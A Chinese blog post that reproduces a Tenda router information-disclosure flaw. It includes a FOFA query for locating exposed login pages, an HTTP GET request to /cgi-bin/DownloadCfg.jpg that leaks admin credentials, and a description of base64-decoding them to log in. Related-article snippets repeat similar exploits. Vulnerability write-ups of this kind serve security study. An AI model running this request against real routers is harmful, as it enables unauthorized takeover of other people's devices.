Tenda路由器 信息泄露漏洞复现

最新推荐文章于 2024-05-14 17:00:56 发布
最新推荐文章于 2024-05-14 17:00:56 发布
阅读量563 收藏 1
点赞数
文章标签: 智能路由器 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/134922402
版权

前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!

一、产品简介

Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器。Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。

二、漏洞描述

该产品DownloadCfg.jpg文件存在信息泄露漏洞,攻击者可获得路由器后台账号密码。

三、影响范围

Tenda-路由器设备

四、复现环境

FOFA:title=“Tenda | LOGIN”

五、漏洞复现

1.访问存在漏洞的网站,抓包
在这里插入图片描述

2.POC

GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
Host: ip-port
Content-Length: 2

3.成功获得账号密码
在这里插入图片描述
密码进行了BASE加密,解码后尝试登录,成功
在这里插入图片描述

六、修复建议

关闭互联网访问的权限,及时升级系统

参考链接

https://blog.csdn.net/qq_53003652/article/details/134730593

明丨通
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tenda 路由器 uploadWewifiPic后台RCE漏洞复现
0xSec
12-04 797
腾达路由器后台 uploadWewifiPic 路由存在命令执行漏洞,攻击者可利用漏洞执行任意命令获取服务器权限。
漏洞复现Tenda路由器存在密码泄露
失心少年
09-09 797
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。腾达W15E路由器外置4根增强型360°全向天线,苛刻调校到0.01毫米级的零干扰间距,科学独立布局的信号放大器PA,穿墙性能更强劲,覆盖范围更广,在哪都有好信号。1.执行密码泄露的POC,泄露密码在当前文件的sys.userpass=位置,然后base64解码即可使用该明文密码登录路由器后台。
腾达路由cookie漏洞利用工具
10-30
基于Tenda路由器漏洞利用 当连接到内网时 可以直接打开工具注入cookie 更改路由器管理员密码
Netgear无线路由器漏洞复现(CVE-2019-20760)
最新发布
蚁景网安学院
05-14 553
本文复现漏洞为Netgear路由器远程命令执行漏洞,1.0.4.26之前的NETGEAR R9000设备会受到身份验证绕过的影响,可利用漏洞将木马程序下载下来,获取 shell。
腾达路由器linux开发,Tenda无线路由器远程命令执行后门漏洞
weixin_42376940的博客
05-12 442
发布日期:2013-10-15更新日期:2013-10-19受影响系统:tenda W302Rtenda W330R描述:--------------------------------------------------------------------------------Tenda是深圳的一家网络设备提供商。Tenda的 W330R、W302R无线路由器固件最新版本及Medialink ...
【从零复现CVE漏洞Tenda 路由器栈溢出复现(CVE-2018-18708)
m0_55368674的博客
02-09 2343
Tenda 路由器栈溢出复现(CVE-2018-18708)
我用一个例子疏通“路由器漏洞&复现”【建议收藏!!】
kali_Ma的博客
07-04 787
一、介绍 ​ 该缺陷存在于Cisco IOS XR软件的Cisco Discovery Protocol中,它可能导致黑客的攻击。 ​ “该漏洞是Cisco Discovery Protocol中字段字符串输入的错误验证所致。黑客可以通过向受影响设备发送恶意Cisco Discovery Protocol数据包以利用漏洞。” “被成功利用的漏洞可能导致堆栈溢出,黑客便可以执行任意代码。” ​ Cisco专家指出,其他黑客也可以利用此缺陷。美国国家安全局(NSA)声称该漏洞漏洞排名中位居前25。 IOS .
路由器漏洞复现_看了之后每个人都是黑客
m0_67742636的博客
06-20 799
渗透测试,网络安全路由器安全
漏洞复现信息漏洞
zkaqlaoniao的博客
12-04 151
Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。4、从配置中查找账户密码(直接打开JPG就行了)
D-Link DIR505路由器溢出漏洞实战
牛叫兽的测试学习和分享
12-14 5085
IOT安全,溢出漏洞学习实践
Tenda腾达路由器5G信号在哪里? 腾达路由器关闭5G信号的方法
10-01
腾达路由器5G信号与关闭方法】 腾达路由器提供了两种不同频段的无线信号,分别是2.4G和5G。2.4G频段的无线信号具有更广泛的覆盖范围,但可能受到更多干扰,适合对网络速度要求不高的设备使用。而5G频段的无线信号...
tenda路由器限速方法 腾达路由器怎么设置限速
10-01
腾达tenda tei402型号路由器,是具有限速功能的路由器,这里介绍如何设置,以实现对局域网电脑进行流量和速度的限制
Tenda腾达部分路由器固件下载(.bin文件)
08-10
"Tenda腾达部分路由器固件下载"的标题表明这是一个提供腾达路由器固件更新的资源集合。这些固件通常以.bin文件格式提供,这是许多嵌入式系统常用的二进制文件格式,包含可直接加载到路由器内存中的机器指令和配置...
腾达路由器怎么恢复出厂设置?2种使Tenda路由器恢复出厂设置的方法介绍
10-01
腾达路由器恢复出厂设置详解】 在日常使用腾达Tenda路由器的过程中,有时由于配置错误或系统异常,可能需要将路由器恢复到出厂设置,以便清除所有个性化配置并重新开始设置。本文将详细介绍两种简单易行的...
2014腾达路由器怎么设置?新旧Tenda无线路由器wifi设置对比图解
10-01
腾达路由器设置详解】 2014年腾达推出的新款无线路由器,如8002R型号,显著提升了用户设置的便捷性。新款腾达路由器采用了智能易安装技术,使得即便是对网络设备不熟悉的用户也能轻松完成配置。本文将详细介绍...
复现Tenda信息泄露漏洞_19
fushuang333的博客
01-15 1233
复现Tenda信息泄露漏洞Tenda远端WEB管理是为了在外网(其他网络)可以访问路由器,从而进行管理。
漏洞复现-Tenda 路由器
zkaqlaoniao的博客
12-05 266
Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器Tenda 路由器存在信息泄露漏洞,攻击者通过构造特殊 URL 地址,读取系统敏感信息网访问该系统。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。4、从配置中查找账户密码(直接打开JPG就行了)免费领取安全学习资料包!帮助你在面试中脱颖而出。
漏洞复现--Tenda路由器DownloadCfg信息泄露
qq_53003652的博客
12-01 714
Tenda是一家专门提供网络设备和解决方案的公司,其中最知名的产品之一是路由器Tenda路由器在家庭和小型办公室中非常受欢迎,因为它们提供了稳定的无线网络连接和易于设置的功能。该产品存在信息泄露漏洞,攻击者可获得路由器后台账号密码。密码base64解码。
Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞
weixin_68647219的博客
07-31 3538
简介:腾达W15E路由器外置4根5dBi高增益无线天线,同时还内置独立PA和LNA模块,大大增强无线信号的发射和接收能力,可以覆盖300平米的空间,走到哪里都不用担心信号问题。腾达W15E路由器系统存在密码泄露漏洞,攻击者通过漏洞可以获取应用后台权限。/cgi-bin/DownloadCfg/RouterCfm.cfg,可以获得RouterCfm.cfg文件。执行poc,泄露密码在sys.userpass=位置,base64解码即可登录。2.漏洞URL:http://www.xxx.com。
tp-link 腾达路由器桥接
05-05
将 TP-Link 腾达路由器设置为桥接模式需要以下步骤: 1. 连接电脑和 TP-Link 腾达路由器,打开浏览器,输入路由器 IP 地址,登录路由器管理界面。 2. 在左侧菜单栏中选择“网络设置”,然后选择“WAN”。 3. 在 WAN 设置页面中,选择“桥接模式”,然后单击“保存”。 4. 确认弹出框中的提示信息,单击“确定”。 5. 在左侧菜单栏中选择“网络设置”,然后选择“LAN”。 6. 在 LAN 设置页面中,取消“启用 DHCP 服务器”选项。 7. 单击“保存”,然后重启路由器。 完成以上步骤后,TP-Link 腾达路由器就已经设置为桥接模式了。如果您需要使用无线网络,可以将另一个路由器连接到 TP-Link 腾达路由器的 LAN 口上,并在该路由器上设置您需要的无线网络
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值